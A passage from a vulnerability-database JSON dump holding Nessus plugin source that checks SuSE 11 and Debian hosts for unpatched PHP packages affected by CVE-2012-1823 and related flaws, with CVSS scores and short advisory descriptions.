(rpm_check(release:\"SLES11\", sp:2, reference:\"php53-bcmath-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-bz2-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-calendar-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-ctype-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-curl-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-dba-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-dom-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-exif-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-fastcgi-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-fileinfo-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-ftp-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-gd-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-gettext-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-gmp-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-iconv-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-intl-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-json-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-ldap-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-mbstring-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-mcrypt-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-mysql-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-odbc-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-openssl-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-pcntl-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-pdo-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-pear-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-pgsql-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-pspell-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-shmop-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-snmp-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-soap-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-suhosin-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-sysvmsg-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-sysvsem-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-sysvshm-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-tokenizer-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-wddx-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-xmlreader-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-xmlrpc-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-xmlwriter-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-xsl-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-zip-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-zlib-5.3.8-0.27.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T14:37:33", "description": "This update fixes several security issues in PHP5 :\n\n - A directory traversal bug has been fixed in PHP5.\n (CVE-2012-1172)\n\n - A command injection was possible when PHP5 was operated\n in CGI mode using commandline options. This problem does\n not affect PHP5 in the normal apache module mode setup.\n (CVE-2012-1823 / CVE-2012-2311)\n\n - Also a pack/unpacking bug on big endian 64bit\n architectures (ppc64 and s390x) has been fixed.\n (bnc#753778)", "edition": 18, "published": "2013-01-25T00:00:00", "title": "SuSE 11.1 Security Update : PHP5 (SAT Patch Number 6252)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "modified": "2013-01-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:php5-mysql", "p-cpe:/a:novell:suse_linux:11:php5-bcmath", "p-cpe:/a:novell:suse_linux:11:php5-json", "p-cpe:/a:novell:suse_linux:11:php5-zlib", "p-cpe:/a:novell:suse_linux:11:php5-dbase", "p-cpe:/a:novell:suse_linux:11:php5-soap", "p-cpe:/a:novell:suse_linux:11:php5-pgsql", "p-cpe:/a:novell:suse_linux:11:php5-bz2", "p-cpe:/a:novell:suse_linux:11:php5-gd", "p-cpe:/a:novell:suse_linux:11:php5-suhosin", "p-cpe:/a:novell:suse_linux:11:php5-mcrypt", "p-cpe:/a:novell:suse_linux:11:php5-dom", "p-cpe:/a:novell:suse_linux:11:php5-sysvshm", "p-cpe:/a:novell:suse_linux:11:php5-gmp", "p-cpe:/a:novell:suse_linux:11:php5-pdo", "p-cpe:/a:novell:suse_linux:11:php5-fastcgi", "p-cpe:/a:novell:suse_linux:11:php5-ldap", "p-cpe:/a:novell:suse_linux:11:php5-mbstring", "p-cpe:/a:novell:suse_linux:11:php5-odbc", "p-cpe:/a:novell:suse_linux:11:php5-dba", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:php5-openssl", "p-cpe:/a:novell:suse_linux:11:php5-tokenizer", "p-cpe:/a:novell:suse_linux:11:php5-pspell", "p-cpe:/a:novell:suse_linux:11:php5-zip", "p-cpe:/a:novell:suse_linux:11:php5-gettext", "p-cpe:/a:novell:suse_linux:11:php5-ctype", "p-cpe:/a:novell:suse_linux:11:php5-sysvmsg", "p-cpe:/a:novell:suse_linux:11:php5", "p-cpe:/a:novell:suse_linux:11:apache2-mod_php5", "p-cpe:/a:novell:suse_linux:11:php5-snmp", "p-cpe:/a:novell:suse_linux:11:php5-wddx", "p-cpe:/a:novell:suse_linux:11:php5-pcntl", "p-cpe:/a:novell:suse_linux:11:php5-xmlrpc", "p-cpe:/a:novell:suse_linux:11:php5-hash", "p-cpe:/a:novell:suse_linux:11:php5-exif", "p-cpe:/a:novell:suse_linux:11:php5-sysvsem", "p-cpe:/a:novell:suse_linux:11:php5-pear", "p-cpe:/a:novell:suse_linux:11:php5-calendar", "p-cpe:/a:novell:suse_linux:11:php5-xsl", "p-cpe:/a:novell:suse_linux:11:php5-curl", "p-cpe:/a:novell:suse_linux:11:php5-xmlreader", "p-cpe:/a:novell:suse_linux:11:php5-shmop", "p-cpe:/a:novell:suse_linux:11:php5-xmlwriter", "p-cpe:/a:novell:suse_linux:11:php5-iconv", "p-cpe:/a:novell:suse_linux:11:php5-ftp"], "id": "SUSE_11_APACHE2-MOD_PHP5-120504.NASL", "href": "https://www.tenable.com/plugins/nessus/64099", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64099);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1172\", \"CVE-2012-1823\", \"CVE-2012-2311\");\n\n script_name(english:\"SuSE 11.1 Security Update : PHP5 (SAT Patch Number 6252)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in PHP5 :\n\n - A directory traversal bug has been fixed in PHP5.\n (CVE-2012-1172)\n\n - A command injection was possible when PHP5 was operated\n in CGI mode using commandline options. This problem does\n not affect PHP5 in the normal apache module mode setup.\n (CVE-2012-1823 / CVE-2012-2311)\n\n - Also a pack/unpacking bug on big endian 64bit\n architectures (ppc64 and s390x) has been fixed.\n (bnc#753778)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=752030\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=753778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=760536\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1172.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1823.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2311.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 6252.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-mod_php5-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-bcmath-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-bz2-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-calendar-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-ctype-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-curl-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-dba-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-dbase-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-dom-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-exif-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-fastcgi-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-ftp-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-gd-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-gettext-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-gmp-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-hash-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-iconv-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-json-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-ldap-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-mbstring-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-mcrypt-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-mysql-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-odbc-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-openssl-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pcntl-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pdo-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pear-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pgsql-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pspell-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-shmop-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-snmp-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-soap-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-suhosin-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-sysvmsg-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-sysvsem-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-sysvshm-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-tokenizer-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-wddx-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-xmlreader-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-xmlrpc-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-xmlwriter-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-xsl-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-zip-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-zlib-5.2.14-0.7.30.38.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:47:26", "description": "De Eindbazen discovered that PHP, when run with mod_cgi, will\ninterpret a query string as command line parameters, allowing to\nexecute arbitrary code.\n\nAdditionally, this update fixes insufficient validation of upload name\nwhich lead to corrupted $_FILES indices.", "edition": 18, "published": "2012-05-10T00:00:00", "title": "Debian DSA-2465-1 : php5 - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "modified": "2012-05-10T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:php5"], "id": "DEBIAN_DSA-2465.NASL", "href": "https://www.tenable.com/plugins/nessus/59059", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2465. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59059);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1172\", \"CVE-2012-1823\", \"CVE-2012-2311\");\n script_bugtraq_id(53388, 53403);\n script_xref(name:\"DSA\", value:\"2465\");\n\n script_name(english:\"Debian DSA-2465-1 : php5 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"De Eindbazen discovered that PHP, when run with mod_cgi, will\ninterpret a query string as command line parameters, allowing to\nexecute arbitrary code.\n\nAdditionally, this update fixes insufficient validation of upload name\nwhich lead to corrupted $_FILES indices.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2465\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php5 packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 5.3.3-7+squeeze9.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-php5\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php-pear\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-cgi\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-cli\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-common\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-curl\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-dbg\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-dev\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-enchant\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-gd\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-gmp\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-imap\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-interbase\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-intl\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-ldap\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-mcrypt\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-mysql\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-odbc\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-pgsql\", 